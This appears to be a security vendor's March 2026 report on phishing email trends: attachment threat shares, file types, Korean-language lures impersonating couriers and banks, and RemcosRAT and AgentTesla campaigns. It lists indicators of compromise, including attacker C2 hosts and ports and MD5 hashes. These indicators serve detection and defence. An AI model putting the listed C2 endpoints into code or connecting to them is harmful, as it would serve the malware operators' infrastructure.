Malware Phishing/Scam Trend

March 2026 Phishing Email Trends Report

  • Apr 22 2026
March 2026 Phishing Email Trends Report

Statistics on Attachment Threats Types.

  • trojans accounted for the largest share of attachment-based threats in March 2026 at 21%.
  • phishing (FakePage) came in at 15%, with a significant month-over-month decrease in share from 42% to 15%, but a slight decrease in volume.
  • downloaders were identified at 9% and droppers at 7%.
  • trojans continue to circulate variants with double extensions and legitimate file names to entice execution.
  • phishing uses HTML scripts and PDF hyperlinks to steal login credentials or lead to fake sites.

Attachment file extension statistics.

  • the script category is dominated by HTML at 14% and JS at 11%.
  • among compressed files, ZIP was 14%, RAR 8%, and 7Z 5%.
  • for document files, PDF was 13%, XLS 5%, and DOCX 2%.
  • compared to the previous month, Script-type malware distribution increased significantly, while Trojan distribution increased slightly.
  • Droppers and Downloaders decreased slightly, while Compress and Document types increased slightly.

Phishing email lists distributed in Korean.

  • Many emails impersonating courier, financial, and tax invoices from FedEx, DHL, and Hana Bank were detected.
  • In the Script type case, the user was induced to enter login information on the phishing page by impersonating Woori Bank, and a Telegram API call token was used as C2.
  • In the Document type case, RemcosRAT distribution and information theft occurred by executing a PDF disguised as an industrial equipment supplier, and the C2 was identified as controller.airdns.org:45177.
  • In the Compress type case, AgentTesla was distributed by decompressing and executing a textile exporter, and an external mail server and suspicious address were used as the C2.

Indicators of Compromise (IoC).

  • a list of the top 30 MD5 hashes of the collected malware files was provided.
  • relevant C2 and token examples included Telegram API calls, controller.airdns.org:45177, and ccp11nl.hyperhost.ua:587.
  • the report synthesizes the trends of HTML-based phishing, document-compressed file induced execution, and remote control malware distribution.

MD5

06dc18771404694814d6a430bb65d1a3
0a15c9a545fbf78d77f8c130a3b0f840
0a18f61e8d8e9873cdda4b3b6785d7ad
0d15bf48b73de307eff29f07a6e6d55b
0e9bd0c9991b21b13eddb518dee0eecf

Tags:
Previous Post